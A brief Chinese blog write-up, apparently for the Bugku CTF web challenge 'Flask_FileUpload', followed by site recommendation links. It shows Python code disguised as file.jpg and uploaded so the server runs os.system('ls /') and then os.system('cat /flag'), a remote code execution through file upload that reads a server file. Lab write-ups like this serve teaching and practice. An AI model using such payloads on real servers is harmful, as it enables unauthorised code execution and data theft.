技术栈

Bugku-web-Flask_FileUpload

黑白时光les2024-08-01 11:52

Bugku-web-Flask_FileUpload

查看源代码,提示用python返回结果

在file.jpg中写python代码

复制代码
import os
os.system('ls / ')

上传后查看源代码,找到flag文件夹

修改代码

复制代码
import os
os.system('cat /flag ')
上一篇:Python面试题:如何使用WebSocket实现实时Web应用
下一篇:单片机之串口通信协议
相关推荐
你挚爱的强哥
2 分钟前
SCSS上传图片占位区域样式
前端·css·scss
奶球不是球
2 分钟前
css新特性
前端·css
Nicholas68
4 分钟前
flutter滚动视图之Viewport、RenderViewport源码解析(六)
前端
无羡仙
14 分钟前
React 状态更新:如何避免为嵌套数据写一长串 ...?
前端·react.js
KevinWang_
18 分钟前
让 AI 写一个给图片加水印的 Python 脚本
python
TimelessHaze
41 分钟前
🔥 一文掌握 JavaScript 数组方法(2025 全面指南):分类解析 × 业务场景 × 易错点
前端·javascript·trae
go&Python
1 小时前
检索模型与RAG
开发语言·python·llama
jvxiao
1 小时前
搭建个人博客系列--(4) 利用Github Actions自动构建博客
前端
阿里云大数据AI技术
1 小时前
ODPS 十五周年实录 | Data + AI,MaxCompute 下一个15年的新增长引擎
大数据·python·sql
Neolock
1 小时前
Linux应急响应一般思路(三)
linux·web安全·应急响应
热门推荐
01UV安装并设置国内源02如何在Windows/Linux系统上安装adb03【2025.08.06最新版】Android Studio下载、安装及配置记录(自动下载sdk)04不再让Windows更新!&Edge游戏助手卸载及关闭自动更新05Cursor 快速入门指南:从安装到核心功能06Claude Code VSCode集成开发指南:AI编程助手完整配置07【踩坑笔记】50系显卡适配的 PyTorch 安装08KGG转MP3工具|非KGM文件|解密音频09Redis 下载与安装 教程 windows版102025最新国内服务器可用docker源仓库地址大全(2025年8月更新)